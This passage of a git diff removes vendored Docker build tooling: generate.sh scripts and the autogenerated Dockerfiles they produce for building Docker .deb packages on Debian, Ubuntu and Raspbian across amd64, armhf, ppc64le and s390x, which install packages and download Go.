"$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! - # - - FROM $from - EOF - - echo >> "$version/Dockerfile" - - if [ "$distro" = "debian" ]; then - cat >> "$version/Dockerfile" <<-'EOF' - # allow replacing httpredir or deb mirror - ARG APT_MIRROR=deb.debian.org - RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - EOF - - if [ "$suite" = "wheezy" ]; then - cat >> "$version/Dockerfile" <<-'EOF' - RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list - EOF - fi - - echo "" >> "$version/Dockerfile" - fi - - extraBuildTags='pkcs11' - runcBuildTags= - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - libltdl-dev # for pkcs11 "ltdl.h" - libseccomp-dev # for "seccomp.h" & "libseccomp.so" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - vim-common # tini dep - ) - # packaging for "sd-journal.h" and libraries varies - case "$suite" in - precise|wheezy) ;; - jessie|trusty) packages+=( libsystemd-journal-dev );; - *) packages+=( libsystemd-dev );; - esac - - # debian wheezy & ubuntu precise do not have the right libseccomp libs - # debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :( - case "$suite" in - precise|wheezy|jessie|trusty) - packages=( 
"${packages[@]/libseccomp-dev}" ) - runcBuildTags="apparmor selinux" - ;; - *) - extraBuildTags+=' seccomp' - runcBuildTags="apparmor seccomp selinux" - ;; - esac - - - if [ "$suite" = 'precise' ]; then - # precise has a few package issues - - # - dh-systemd doesn't exist at all - packages=( "${packages[@]/dh-systemd}" ) - - # - libdevmapper-dev is missing critical structs (too old) - packages=( "${packages[@]/libdevmapper-dev}" ) - extraBuildTags+=' exclude_graphdriver_devicemapper' - - # - btrfs-tools is missing "ioctl.h" (too old), so it's useless - # (since kernels on precise are old too, just skip btrfs entirely) - packages=( "${packages[@]/btrfs-tools}" ) - extraBuildTags+=' exclude_graphdriver_btrfs' - fi - - if [ "$suite" = 'wheezy' ]; then - # pull a couple packages from backports explicitly - # (build failures otherwise) - backportsPackages=( btrfs-tools ) - for pkg in "${backportsPackages[@]}"; do - packages=( "${packages[@]/$pkg}" ) - done - echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - fi - - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" - echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - - echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" - echo "ENV 
RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile deleted file mode 100644 index aa027f83b3..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM ubuntu:precise - -RUN apt-get update && apt-get install -y apparmor bash-completion build-essential cmake curl ca-certificates debhelper dh-apparmor git libapparmor-dev libltdl-dev libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor exclude_graphdriver_btrfs exclude_graphdriver_devicemapper pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile deleted file mode 100644 index b03a853ed6..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! 
-# - -FROM ubuntu:trusty - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile deleted file mode 100644 index af03f6226f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! 
-# - -FROM ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile deleted file mode 100644 index 5ac1edf1a4..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! 
-# - -FROM ubuntu:yakkety - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile deleted file mode 100644 index a4ac781eb9..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile +++ /dev/null @@ -1,20 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
-# - -FROM armhf/debian:jessie - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh deleted file mode 100755 index e110a219ab..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh +++ /dev/null @@ -1,158 +0,0 @@ -#!/bin/bash -set -e - -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh debian-jessie -# to only update debian-jessie/Dockerfile -# or: ./generate.sh debian-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - distro="${version%-*}" - suite="${version##*-}" - from="${distro}:${suite}" - - case "$from" in - raspbian:jessie) - from="resin/rpi-raspbian:jessie" - ;; - *) - from="armhf/$from" - ;; - esac - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
- # - - FROM $from - EOF - - echo >> "$version/Dockerfile" - - if [[ "$distro" = "debian" || "$distro" = "raspbian" ]]; then - cat >> "$version/Dockerfile" <<-'EOF' - # allow replacing httpredir or deb mirror - ARG APT_MIRROR=deb.debian.org - RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - EOF - - if [ "$suite" = "wheezy" ]; then - cat >> "$version/Dockerfile" <<-'EOF' - RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list - EOF - fi - - echo "" >> "$version/Dockerfile" - fi - - extraBuildTags='pkcs11' - runcBuildTags= - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - libltdl-dev # for pkcs11 "ltdl.h" - libseccomp-dev # for "seccomp.h" & "libseccomp.so" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - vim-common # tini dep - ) - # packaging for "sd-journal.h" and libraries varies - case "$suite" in - precise|wheezy) ;; - jessie|trusty) packages+=( libsystemd-journal-dev );; - *) packages+=( libsystemd-dev );; - esac - - # debian wheezy & ubuntu precise do not have the right libseccomp libs - # debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :( - case "$suite" in - precise|wheezy|jessie|trusty) - packages=( "${packages[@]/libseccomp-dev}" ) - runcBuildTags="apparmor selinux" - ;; - *) - extraBuildTags+=' seccomp' - runcBuildTags="apparmor 
seccomp selinux" - ;; - esac - - - if [ "$suite" = 'precise' ]; then - # precise has a few package issues - - # - dh-systemd doesn't exist at all - packages=( "${packages[@]/dh-systemd}" ) - - # - libdevmapper-dev is missing critical structs (too old) - packages=( "${packages[@]/libdevmapper-dev}" ) - extraBuildTags+=' exclude_graphdriver_devicemapper' - - # - btrfs-tools is missing "ioctl.h" (too old), so it's useless - # (since kernels on precise are old too, just skip btrfs entirely) - packages=( "${packages[@]/btrfs-tools}" ) - extraBuildTags+=' exclude_graphdriver_btrfs' - fi - - if [ "$suite" = 'wheezy' ]; then - # pull a couple packages from backports explicitly - # (build failures otherwise) - backportsPackages=( btrfs-tools ) - for pkg in "${backportsPackages[@]}"; do - packages=( "${packages[@]/$pkg}" ) - done - echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - fi - - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" - if [ "$distro" == 'raspbian' ]; - then - cat <> "$version/Dockerfile" -# GOARM is the ARM architecture version which is unrelated to the above Golang version -ENV GOARM 6 -EOF - fi - echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - - echo "ENV DOCKER_BUILDTAGS 
$buildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile deleted file mode 100644 index 4dbfd093d8..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile +++ /dev/null @@ -1,22 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! -# - -FROM resin/rpi-raspbian:jessie - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -# GOARM is the ARM architecture version which is unrelated to the above Golang version -ENV GOARM 6 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile deleted file mode 100644 index b36c1dac71..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
-# - -FROM armhf/ubuntu:trusty - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile deleted file mode 100644 index b5e55ad2dd..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
-# - -FROM armhf/ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile deleted file mode 100644 index 69c2e7f2d4..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! 
-# - -FROM armhf/ubuntu:yakkety - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh deleted file mode 100755 index 7d22e8c47f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh deleted file mode 100755 index 0e20b9c4b5..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh +++ /dev/null @@ -1,103 +0,0 @@ -#!/bin/bash -set -e - -# This file is used to auto-generate Dockerfiles for making debs via 'make deb' -# -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh ubuntu-xenial -# to only update ubuntu-xenial/Dockerfile -# or: ./generate.sh ubuntu-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) 
- -for version in "${versions[@]}"; do - echo "${versions[@]}" - distro="${version%-*}" - suite="${version##*-}" - from="ppc64le/${distro}:${suite}" - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! - # - - FROM $from - - EOF - - extraBuildTags='pkcs11' - runcBuildTags= - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - libltdl-dev # for pkcs11 "ltdl.h" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - vim-common # tini dep - ) - - case "$suite" in - trusty) - packages+=( libsystemd-journal-dev ) - ;; - *) - # libseccomp isn't available until ubuntu xenial and is required for "seccomp.h" & "libseccomp.so" - packages+=( libseccomp-dev ) - packages+=( libsystemd-dev ) - ;; - esac - - # buildtags - case "$suite" in - # trusty has no seccomp package - trusty) - runcBuildTags="apparmor selinux" - ;; - # ppc64le support was backported into libseccomp 2.2.3-2, - # so enable seccomp by default - *) - extraBuildTags+=' seccomp' - runcBuildTags="apparmor seccomp selinux" - ;; - esac - - # update and install packages - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - awk '$1 == "ENV" 
&& $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.ppc64le >> "$version/Dockerfile" - echo 'RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile deleted file mode 100644 index 4182d683b0..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! 
-# - -FROM ppc64le/ubuntu:trusty - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile deleted file mode 100644 index f1521db72f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! 
-# - -FROM ppc64le/ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile deleted file mode 100644 index 4f8cc66769..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! 
-# - -FROM ppc64le/ubuntu:yakkety - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh deleted file mode 100755 index 8271d9dc47..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh deleted file mode 100755 index b8f5860844..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh +++ /dev/null @@ -1,96 +0,0 @@ -#!/bin/bash -set -e - -# This file is used to auto-generate Dockerfiles for making debs via 'make deb' -# -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh ubuntu-xenial -# to only update ubuntu-xenial/Dockerfile -# or: ./generate.sh ubuntu-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for 
version in "${versions[@]}"; do - echo "${versions[@]}" - distro="${version%-*}" - suite="${version##*-}" - from="s390x/${distro}:${suite}" - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"! - # - - FROM $from - - EOF - - extraBuildTags='pkcs11' - runcBuildTags= - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - 